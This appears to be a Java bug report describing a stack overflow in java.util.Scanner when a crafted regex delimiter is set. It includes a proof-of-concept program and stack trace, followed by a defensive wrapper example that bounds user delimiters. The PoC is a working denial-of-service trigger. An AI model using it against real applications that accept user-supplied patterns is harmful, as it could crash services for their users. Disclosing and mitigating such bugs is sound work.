Details
Bug
Resolution: Unresolved
P4
18
None
Description
j.u.Scanner allows a regular expression string to be set as the text
delimiter. A missing upper limit on recursion in regex processing causes a
stack overflow when querying for the availability of a potential next token
to be delivered by the scanner.
Developers could use this API to allow users to query larger texts for
patterns, for example in a web application. However, edge cases exist that
cause a StackOverflowError to be triggered instead of the recursion scenario
being detected earlier.
The following PoC illustrates the issue:
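import java.util.*;

public class ScannerSOE {
    public static void main(String[] a) {
        // Delimiter template: a regex character class, decoded with the platform default charset.
        String payload = new String(new byte[]{91,92,97,92,87,45,45,45,45,45,45,45,45,45,45,120,121,122,123,49,44,51,38,38,38,99,-118,-118,69,93,-126,-36});
        Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
        // One character from the template is repeated 16384 times inside the delimiter.
        s.useDelimiter(payload.substring(0,26)+(new String(new byte[]{-118})).repeat(16384)+payload.substring(27));
        // Querying for the next token is where the StackOverflowError surfaces.
        s.hasNext();
    }
}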
To reproduce:
$ java ScannerSOE 2>&1 | head -4
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
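An added example, not part of the original report or of the JDK: one way an application that accepts user-supplied delimiters could bound them before handing them to Scanner. The class name, the 256-character cap and the asRegex flag are assumptions for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;

// Added example (not JDK code): tokenizes text with a caller-supplied delimiter
// while bounding what an untrusted delimiter can do to the regex engine.
public class BoundedDelimiterScanner {
    // Assumed limit; choose one that fits the application's legitimate delimiters.
    static final int MAX_DELIMITER_LENGTH = 256;

    static List<String> tokens(String text, String delimiter, boolean asRegex) {
        if (delimiter == null || delimiter.isEmpty()
                || delimiter.length() > MAX_DELIMITER_LENGTH) {
            throw new IllegalArgumentException("delimiter length out of range");
        }
        try {
            // LITERAL disables all metacharacters, so "[" cannot open a character class.
            Pattern p = asRegex ? Pattern.compile(delimiter)
                                : Pattern.compile(delimiter, Pattern.LITERAL);
            List<String> out = new ArrayList<>();
            try (Scanner s = new Scanner(text)) {
                s.useDelimiter(p);
                while (s.hasNext()) {
                    out.add(s.next());
                }
            }
            return out;
        } catch (PatternSyntaxException e) {
            throw new IllegalArgumentException("invalid delimiter pattern", e);
        } catch (StackOverflowError e) {
            // Last line of defence: fail this call instead of letting the Error propagate.
            throw new IllegalArgumentException("delimiter pattern too deeply nested");
        }
    }

    public static void main(String[] args) {
        String text = "1 fish 2 fish red fish blue fish";
        System.out.println(tokens(text, " fish ", false));
        // Constructed oversized character-class delimiter; the length cap rejects it
        // before it reaches the regex engine.
        String big = "[a" + "b".repeat(16384) + "]";
        try {
            tokens(text, big, true);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The length cap and literal mode do the real work; the StackOverflowError handler only covers patterns that pass the cap and still recurse too deeply.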